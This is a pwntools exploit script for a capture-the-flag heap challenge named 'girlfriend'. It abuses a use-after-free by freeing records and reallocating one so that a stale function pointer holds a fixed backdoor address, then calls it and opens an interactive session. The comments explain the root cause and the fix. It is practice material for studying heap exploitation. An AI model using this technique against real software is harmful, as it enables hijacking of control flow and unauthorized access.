UAF 劫持函数指针
from pwn import *
from LibcSearcher import*
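# Global pwntools settings: 64-bit Linux target; 'debug' logging prints every
# byte sent and received on the tube.
context(arch='amd64', os='linux', log_level='debug')
# Terminal command gdb.attach() uses to open the debugger (horizontal tmux split).
context.terminal = ['tmux', 'splitw', '-h']

# Open exactly one tube. The original started the local binary and then
# immediately rebound `io` to the remote service, which left the local process
# orphaned and aborted the script whenever ./girlfriend was not present.
# Remote stays the default; pass LOCAL on the command line (pwntools `args`)
# to run against the local copy instead.
if args.LOCAL:
    io = process('./girlfriend')
else:
    io = remote('node4.anna.nssctf.cn', 28808)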
# Short aliases over the module-level tube `io`. Each one forwards its
# arguments unchanged and returns whatever the tube method returns.
def s(content):
    """Send `content` on the tube as-is (no newline appended)."""
    return io.send(content)


def sl(content):
    """Send `content` followed by a newline."""
    return io.sendline(content)


def sa(content, send):
    """Wait until `content` has been received, then send `send` as-is."""
    return io.sendafter(content, send)


def sla(content, send):
    """Wait until `content` has been received, then send `send` plus a newline."""
    return io.sendlineafter(content, send)


def rc(number):
    """Receive up to `number` bytes from the tube."""
    return io.recv(number)


def ru(content):
    """Receive until `content` has been seen on the tube."""
    return io.recvuntil(content)
def slog(name, address):
    """Log a labelled address at success level, formatted as ``name==>0x...``.

    `name` must be a str and `address` an int (it is passed to hex()).
    """
    message = name + "==>" + hex(address)
    io.success(message)
def debug():
    """Attach gdb to the process behind `io`.

    The debugger window is opened with the command in context.terminal.
    NOTE(review): this presumably only works while `io` is the local process
    tube, not the remote connection -- confirm before relying on it.
    """
    gdb.attach(io)
def add(size, name):
    """Drive menu option 1: answer its two prompts with `size` and `name`.

    The binary is not shown here; presumably this makes the program allocate
    a record of `size` bytes and store `name` in it -- confirm against the
    target. `name` may be str or bytes; it is sent with a trailing newline.
    """
    exchanges = (
        (":", '1'),
        (" :", str(size)),
        (" :", name),
    )
    for prompt, reply in exchanges:
        sla(prompt, reply)
def delete(index):
    """Drive menu option 2 for record `index`.

    Presumably this makes the program free the record. Whether the program
    also clears its stored pointer cannot be seen from this script; a program
    that frees without clearing is left with a dangling pointer.
    """
    exchanges = (
        (":", '2'),
        (" :", str(index)),
    )
    for prompt, reply in exchanges:
        sla(prompt, reply)
def show(index):
    """Drive menu option 3 for record `index`.

    Presumably this makes the program display the record; the output is left
    on the tube and is not read here.
    """
    exchanges = (
        (":", '3'),
        (" :", str(index)),
    )
    for prompt, reply in exchanges:
        sla(prompt, reply)
def take(index, content):
    """Drive menu option 4: pick record `index`, then send `content` raw.

    Unlike the other helpers, the final payload goes out through `sa`, so no
    newline is appended to `content`. Presumably this edits an existing
    record -- confirm against the binary.
    """
    menu_steps = (
        (":\n", '4'),
        ("modify :", str(index)),
    )
    for prompt, reply in menu_steps:
        sla(prompt, reply)
    # Raw send: the bytes the program receives are exactly `content`.
    sa("content\n", content)
# Address that gets written into the re-allocated record below. It is
# hard-coded from the challenge binary (not shown on this page); a fixed
# address like this only holds if the binary is not built as PIE -- TODO confirm.
backdoor = 0x400baa
# Create two records; presumably they receive indices 0 and 1 in creation order.
add(0x10, 'hahhaa')
add(0x20, 'cccccc')
# Release both records. The show(0) further down only has an effect if the
# program still holds its pointer to record 0 after the free: that dangling
# pointer is the root cause of the use-after-free named in the title. The
# program-side fix is to clear the stored pointer when a record is deleted.
delete(0)
delete(1)
# New 0x10 request whose contents are `backdoor` packed as 8 little-endian
# bytes. Presumably the allocator hands back memory that stale record 0 still
# references -- NOTE(review): depends on the binary's record layout and the
# libc allocator, neither visible here.
add(0x10, p64(backdoor))
# Ask the program to display record 0, which was freed above. Per the title,
# the program calls through a function pointer kept in the record; that field
# is assumed to now hold `backdoor`.
show(0)
# Hand the tube over to the terminal for manual interaction.
io.interactive()
